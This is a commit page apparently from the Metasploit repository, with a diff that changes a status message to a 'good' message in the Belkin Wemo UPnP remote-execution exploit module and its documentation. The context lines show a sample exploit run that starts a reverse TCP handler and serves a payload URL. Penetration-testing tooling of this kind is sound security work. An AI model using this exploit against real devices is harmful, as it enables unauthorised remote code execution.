Land #11516, reverted print for Wemo exploit
parent
0f583f1e49
commit
c471f1ddb3
|
@ -32,7 +32,7 @@ for Crock-Pot and 49153 for other devices.
|
|||
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.22.22.4:4444
|
||||
[*] Wemo-enabled device detected
|
||||
[+] Wemo-enabled device detected
|
||||
[*] Found firmware version: 2.00.6461
|
||||
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
|
||||
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
|
||||
|
|
|
@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return checkcode
|
||||
end
|
||||
|
||||
vprint_status('Wemo-enabled device detected')
|
||||
vprint_good('Wemo-enabled device detected')
|
||||
checkcode = CheckCode::Detected
|
||||
|
||||
version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
|
||||
|
|
Loading…
Reference in New Issue